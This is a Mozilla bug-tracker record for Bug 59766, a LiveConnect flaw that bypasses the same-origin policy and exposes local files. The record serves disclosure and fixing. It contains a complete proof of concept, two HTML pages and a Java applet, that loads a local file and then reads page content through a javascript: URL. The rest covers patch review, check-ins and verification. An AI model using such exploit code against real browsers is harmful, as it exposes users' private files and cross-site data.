Closed Bug 59766 Opened 24 years ago Closed 24 years ago

Circumventing Same Origin with LiveConnect

Categories

(Core :: Security, defect, P3)

Product:
Core
Component:
Security
Type:
defect

Tracking

()

Status:
VERIFIED FIXED

People

(Reporter: security-bugs, Assigned: security-bugs)

References

Details

(Whiteboard: [branch accept])

Attachments

(1 file)

Patch - Push JS Context Stack
5.13 KB, patch
Details | Diff | Splinter Review 
There is a security vulnerability in LiveConnect which allows
circumventing same origin security policy and also allows accessing
local files.

The code is:
---calljava3.html------
Written by <A HREF="http://www.guninski.com">Georgi Guninski</A> <APPLET
CODE="calljava3.class" WIDTH=700 HEIGHT=300 MAYSCRIPT> <PARAM NAME="jscode"
VALUE="file:///c|/test.html"> <PARAM NAME="call" VALUE="open"> </APPLET>  <A
HREF="calljava3-1.html" TARGET="_blank">DOIT</A> <SCRIPT>
setTimeout("window.open('calljava3-1.html')",3000);
</SCRIPT> -------------------------

---calljava3-1.html------
Written by <A HREF="http://www.guninski.com">Georgi Guninski</A> <APPLET
CODE="calljava3.class" WIDTH=700 HEIGHT=300 MAYSCRIPT> <PARAM NAME="jscode"
VALUE="javascript:window.focus();alert(document.body.innerHTML)"> <PARAM
NAME="call" VALUE="open"> </APPLET> -------------------------

---calljava3.java-------
// Written by Georgi Guninski
import java.applet.Applet;
import netscape.javascript.*;

public class calljava3 extends Applet {

public void start()
{
  try
   {
    JSObject win = (JSObject) JSObject.getWindow(this);
    Object args[] = new Object[2];
    args[0] = getParameter("jscode");
    args[1] = "georgi";	
    win.call(getParameter("call"),args);
   }
    catch(Exception x){System.out.println(x.toString());}
}
}
------------------------
Mass changing QA to ckritzer.
QA Contact: junruh → ckritzer
r=jband.

It would not hurt to note here in the bug or (better) in comments in the code
why this fixes anything. At least some mention that the security manager is
going to be looking at the context stack would help make clear to people who see
the code in the future what is the point of this AutoPush junk. It is quite
non-obvious.

Also, I see an old FIXME comment in the code...
/* FIXME: What about security stuff ? Don't principals need to be set here ? */
...Is this still a concern? If so then is there a bug? If not then this seems
like a good time to whack the comment.
Checked into trunk. I'm leaving this bug open because this should be checked
into the branch in the case of a 6.01 release.
Status: NEW → ASSIGNED
Marking Fixed, though it still needs to go into the branch. Chris, can you verify?
Status: ASSIGNED → RESOLVED
Closed: 24 years ago
Resolution: --- → FIXED
Marking VERIFIED FIXED on Win98 2000-12-05-04 Commercial build
Status: RESOLVED → VERIFIED
Mitch, please check this in on the branch ASAP.
Whiteboard: [branch accept]
mitch - has this been checked into the branch yet?
Checked in on the branch.
Tested this on the win32 2000-12-11-12-MTEST branch build and it looks fine.
This fix may have caused a regression in IM in both trunk and mtest (2nd set of 
builds).   The IM bug number is: http://bugscape/show_bug.cgi?id=3510.
I'm looking into it. In the meantime, please don't back this out; that would
open a serious security problem.
Blocks: 60740
Removing NS_Confidential flag.
Group: netscapeconfidential?
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: